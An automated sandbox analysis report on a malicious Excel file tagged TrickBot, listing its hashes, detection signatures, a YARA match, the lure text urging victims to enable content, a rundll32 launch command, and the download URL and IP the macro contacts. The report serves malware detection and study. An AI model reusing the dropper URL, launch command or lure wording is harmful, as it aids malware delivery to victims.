Loading ...

Play interactive tourEdit tour

Analysis Report upload_dreport_1364433.xls

Overview

General Information

Sample Name:upload_dreport_1364433.xls
Analysis ID:384202
MD5:754118ba489515384b9607af8afb0818
SHA1:a16a7be15f0d55a3a1e8aa771752d2740cd7b0a6
SHA256:9a8354e138e9a773581bb74e52e6e1a7dffb3fb0f6ec1859b4a4d7dc62421c97
Tags:rob47SilentBuilderTrickBotxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5396 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4440 cmdline: rundll32 ..\hdoanal.sbl,StartW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
upload_dreport_1364433.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x16637:$e1: Enable Editing
  • 0x16381:$e3: Enable editing
  • 0x16453:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: www.algostore.in
Source: global trafficTCP traffic: 192.168.2.5:49706 -> 103.212.121.53:80
Source: global trafficTCP traffic: 192.168.2.5:49706 -> 103.212.121.53:80
Source: unknownDNS traffic detected: queries for: www.algostore.in
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: upload_dreport_1364433.xls, 96B10000.0.drString found in binary or memory: http://www.algostore.in/algostoreold/printme.php
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.aadrm.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.cortana.ai
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.office.net
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.onedrive.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://augloop.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cdn.entity.
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://clients.config.office.net/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://config.edge.skype.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cortana.ai
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cortana.ai/api
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://cr.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dev.cortana.ai
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://devnull.onenote.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://directory.services.
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://graph.windows.net
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://graph.windows.net/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://lifecycle.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://login.windows.local
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://management.azure.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://management.azure.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://messaging.office.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://ncus.contentsync.
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://officeapps.live.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://onedrive.live.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://outlook.office.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://outlook.office365.com/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://settings.outlook.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://staging.cortana.ai
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://tasks.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://wus2.contentsync.
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 31A18EA3-F8E4-459A-9527-8B83DF194053.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start c'the decryption of the docume
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: upload_dreport_1364433.xlsInitial sample: CALL
Source: upload_dreport_1364433.xlsInitial sample: EXEC
Source: upload_dreport_1364433.xlsOLE indicator, VBA macros: true
Source: upload_dreport_1364433.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engineClassification label: mal60.expl.evad.winXLS@3/7@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{5E84CE50-C589-444E-86A1-18B8493FE025} - OProcSessId.datJump to behavior
Source: upload_dreport_1364433.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hdoanal.sbl,StartW
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hdoanal.sbl,StartW
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hdoanal.sbl,StartWJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
